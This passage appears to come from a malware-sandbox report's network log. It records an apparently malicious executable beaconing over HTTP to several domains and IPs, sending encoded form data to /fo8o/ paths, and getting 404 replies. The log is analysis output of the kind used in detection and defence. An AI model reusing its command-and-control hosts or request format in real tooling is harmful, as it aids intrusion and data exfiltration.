                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.techchains.info
                                                                                      Origin: http://www.techchains.info
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 218
                                                                                      Referer: http://www.techchains.info/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 39 41 36 68 51 57 76 62 6a 41 46 57 58 33 2b 34 52 52 52 74 48 4a 58 4a 50 64 67 77 3d 3d
                                                                                      Data Ascii: LzY4r=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xV9A6hQWvbjAFWX3+4RRRtHJXJPdgw==
                                                                                      Dec 6, 2024 17:46:09.324565887 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:09 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      15 | 192.168.2.9 | 49989 | 66.29.149.46 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:46:10.727907896 CET | 1808 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.techchains.info
                                                                                      Origin: http://www.techchains.info
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1230
                                                                                      Referer: http://www.techchains.info/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 6c 4d 79 39 68 4d 77 6e 74 50 62 42 6b 57 43 67 36 34 30 57 38 69 68 53 35 4c 52 2b 34 76 2f 70 31 59 78 43 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 56 57 37 4d 4e 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 [TRUNCATED]
                                                                                      Data Ascii: LzY4r= [TRUNCATED]
                                                                                      Dec 6, 2024 17:46:11.955743074 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:11 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      16 | 192.168.2.9 | 49990 | 66.29.149.46 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:46:13.379751921 CET | 507 | OUT | GET /fo8o/?LzY4r=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa4RxULGVWJLXVKOGZXf4u2rY2O36g==&F6=SVfTP6Q02ra8s0 HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.techchains.info
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:46:14.624983072 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:14 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      17 | 192.168.2.9 | 49991 | 195.110.124.133 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:46:20.746615887 CET | 789 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Origin: http://www.elettrosistemista.zip
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 194
                                                                                      Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 6a 6a 30 4e 78 49 41 77 57 76 65 45 77 52 59 6f 58 4d 5a 68 46 6d 37 78 76 39 74 5a
                                                                                      Data Ascii: LzY4r=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCjj0NxIAwWveEwRYoXMZhFm7xv9tZ
                                                                                      Dec 6, 2024 17:46:22.053769112 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:21 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      18 | 192.168.2.9 | 49992 | 195.110.124.133 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:46:23.397727013 CET | 813 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Origin: http://www.elettrosistemista.zip
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 218
                                                                                      Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 37 57 6f 61 6b 78 51 2f 32 65 39 37 32 4a 59 4c 6b 39 35 71 4b 52 72 49 4f 79 4d 77 3d 3d
                                                                                      Data Ascii: LzY4r=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qx7WoakxQ/2e972JYLk95qKRrIOyMw==
                                                                                      Dec 6, 2024 17:46:24.732732058 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:24 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      19 | 192.168.2.9 | 49993 | 195.110.124.133 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:46:26.113141060 CET | 1826 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Origin: http://www.elettrosistemista.zip
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1230
                                                                                      Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 53 66 2f 72 36 30 53 61 49 71 73 39 59 76 43 4b 61 34 34 35 6f 33 44 76 49 62 39 54 72 53 68 7a 2b 48 2b 33 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 58 52 70 75 75 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 [TRUNCATED]
                                                                                      Data Ascii: LzY4r= [TRUNCATED]
                                                                                      Dec 6, 2024 17:46:27.414124966 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:27 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      20 | 192.168.2.9 | 49994 | 195.110.124.133 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:46:28.801249981 CET | 513 | OUT | GET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:46:30.078202963 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:29 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      21 | 192.168.2.9 | 49995 | 217.196.55.202 | 80 | 4564 | C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 6, 2024 17:46:52.352096081 CET | 777 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 194
